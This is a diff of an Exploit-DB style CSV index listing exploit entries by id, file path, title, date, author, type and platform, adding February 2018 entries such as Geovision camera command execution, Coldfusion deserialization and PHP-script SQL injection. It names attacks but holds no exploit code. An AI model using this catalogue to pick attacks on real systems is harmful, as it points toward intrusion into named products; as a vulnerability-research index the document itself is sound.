41232,exploits/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",dos,android,
|
||||
41278,exploits/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,dos,openbsd,80
|
||||
|
@ -5488,6 +5488,10 @@ id,file,description,date,author,type,platform,port
|
|||
43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php,
|
||||
42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,
|
||||
43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333
|
||||
43986,exploits/hardware/dos/43986.py,"Cisco ASA - Crash PoC",2018-02-07,"Sean Dillon",dos,hardware,
|
||||
43992,exploits/multiple/dos/43992.py,"Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption",2018-02-07,"Juan Sacco",dos,multiple,2000
|
||||
43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android,
|
||||
43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple,
|
||||
41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
- Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
|
||||
41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
|
||||
41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
|
||||
|
@ -5887,7 +5891,7 @@ id,file,description,date,author,type,platform,port
|
|||
186,exploits/linux/local/186.pl,"xsplumber - 'strcpy()' Local Buffer Overflow",2000-11-17,vade79,local,linux,
|
||||
193,exploits/linux/local/193.sh,"dump 0.4b15 - Local Privilege Escalation",2000-11-19,mat,local,linux,
|
||||
197,exploits/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",local,solaris,
|
||||
199,exploits/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,local,hp-ux,
|
||||
199,exploits/hp-ux/local/199.c,"HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow",2000-11-20,K2,local,hp-ux,
|
||||
200,exploits/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,local,bsd,
|
||||
202,exploits/bsd/local/202.c,"BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation",2000-11-21,vade79,local,bsd,
|
||||
203,exploits/linux/local/203.sh,"vixie-cron - Local Privilege Escalation",2000-11-21,"Michal Zalewski",local,linux,
|
||||
|
@ -5941,7 +5945,7 @@ id,file,description,date,author,type,platform,port
|
|||
331,exploits/linux/local/331.c,"LibXt - 'XtAppInitialize()' Local Overflow *xterm",1997-05-14,"Ming Zhang",local,linux,
|
||||
332,exploits/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer",1997-05-19,"Joe Zbiciak",local,solaris,
|
||||
333,exploits/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",local,aix,
|
||||
334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,local,irix,
|
||||
334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Local Buffer Overflows",1997-05-25,LSD-PLaNET,local,irix,
|
||||
335,exploits/aix/local/335.c,"AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation",1997-05-26,"Georgi Guninski",local,aix,
|
||||
336,exploits/irix/local/336.c,"SGI IRIX - '/bin/login' Local Buffer Overflow",1997-05-26,"David Hedley",local,irix,
|
||||
337,exploits/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Local Privilege Escalation",1997-05-27,"David Hedley",local,irix,
|
||||
|
@ -6039,7 +6043,7 @@ id,file,description,date,author,type,platform,port
|
|||
877,exploits/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow",2005-03-14,"Kevin Finisterre",local,linux,
|
||||
884,exploits/windows/local/884.cpp,"iSnooker 1.6.8 - Local Password Disclosure",2005-03-16,Kozan,local,windows,
|
||||
885,exploits/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure",2005-03-16,Kozan,local,windows,
|
||||
890,exploits/linux/local/890.pl,"PostScript Utilities - 'psnup' Argument Buffer Overflow",2005-03-21,lammat,local,linux,
|
||||
890,exploits/linux/local/890.pl,"PostScript Utilities - 'psnup' Local Buffer Overflow",2005-03-21,lammat,local,linux,
|
||||
895,exploits/linux/local/895.c,"Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)",2005-03-22,sd,local,linux,
|
||||
896,exploits/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation",2005-03-22,vade79,local,osx,
|
||||
898,exploits/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,local,aix,
|
||||
|
@ -6178,7 +6182,7 @@ id,file,description,date,author,type,platform,port
|
|||
2065,exploits/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow",2006-07-23,"Luigi Auriemma",local,windows,
|
||||
2067,exploits/solaris/local/2067.c,"Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1)",2006-07-24,prdelka,local,solaris,
|
||||
2091,exploits/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 (French) - Local Code Execution",2006-07-30,NSRocket,local,windows,
|
||||
2094,exploits/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows",2006-07-31,"Luigi Auriemma",local,windows,
|
||||
2094,exploits/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows",2006-07-31,"Luigi Auriemma",local,windows,
|
||||
2106,exploits/osx/local/2106.pl,"Apple Mac OSX 10.4.7 (x86) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx,
|
||||
2107,exploits/osx/local/2107.pl,"Apple Mac OSX 10.4.7 (PPC) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx,
|
||||
2108,exploits/osx/local/2108.sh,"Apple Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx,
|
||||
|
@ -9314,6 +9318,7 @@ id,file,description,date,author,type,platform,port
|
|||
43971,exploits/linux/local/43971.rb,"Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)",2018-02-05,Metasploit,local,linux,
|
||||
43973,exploits/windows/local/43973.c,"MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation",2018-02-05,"Souhail Hammou",local,windows,
|
||||
43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
|
||||
43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
|
||||
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
|
||||
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
|
||||
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
|
||||
|
@ -15989,6 +15994,17 @@ id,file,description,date,author,type,platform,port
|
|||
43936,exploits/windows/remote/43936.py,"Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)",2018-02-01,"Daniel Teixeira",remote,windows,
|
||||
43939,exploits/multiple/remote/43939.rb,"BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)",2018-02-01,Metasploit,remote,multiple,
|
||||
43970,exploits/windows/remote/43970.rb,"Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows,
|
||||
43982,exploits/hardware/remote/43982.txt,"Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access",2018-02-01,bashis,remote,hardware,
|
||||
43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware,
|
||||
43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple,
|
||||
43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,
|
||||
43993,exploits/windows/remote/43993.py,"Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution",2018-02-07,"Faisal Tameesh",remote,windows,
|
||||
43997,exploits/hardware/remote/43997.py,"Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD",2018-01-22,bashis,remote,hardware,787
|
||||
43999,exploits/multiple/remote/43999.txt,"Uniview - Remote Command Execution / Export Config (PoC)",2017-10-28,bashis,remote,multiple,
|
||||
44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,
|
||||
44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,
|
||||
44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
|
||||
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
|
||||
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
|
||||
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
|
||||
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
|
||||
|
@ -16464,7 +16480,7 @@ id,file,description,date,author,type,platform,port
|
|||
1567,exploits/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,webapps,php,
|
||||
1569,exploits/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,webapps,asp,
|
||||
1570,exploits/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,webapps,php,
|
||||
1571,exploits/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorised Create Admin",2006-03-09,nukedx,webapps,asp,
|
||||
1571,exploits/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorized Create Admin",2006-03-09,nukedx,webapps,asp,
|
||||
1575,exploits/php/webapps/1575.pl,"Guestbook Script 1.7 - 'include_files' Remote Code Execution",2006-03-11,rgod,webapps,php,
|
||||
1576,exploits/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Nomenumbra,webapps,php,
|
||||
1581,exploits/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,webapps,php,
|
||||
|
@ -37989,6 +38005,12 @@ id,file,description,date,author,type,platform,port
|
|||
43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
|
||||
43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php,
|
||||
43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware,
|
||||
43988,exploits/php/webapps/43988.txt,"Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
|
||||
43989,exploits/php/webapps/43989.txt,"Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
|
||||
43990,exploits/php/webapps/43990.txt,"Naukri Clone Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
|
||||
43991,exploits/php/webapps/43991.txt,"Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
|
||||
43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80
|
||||
43995,exploits/php/webapps/43995.txt,"Entrepreneur Dating Script 2.0.2 - Authentication Bypass",2018-02-07,L0RD,webapps,php,80
|
||||
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
|
||||
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
|
||||
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue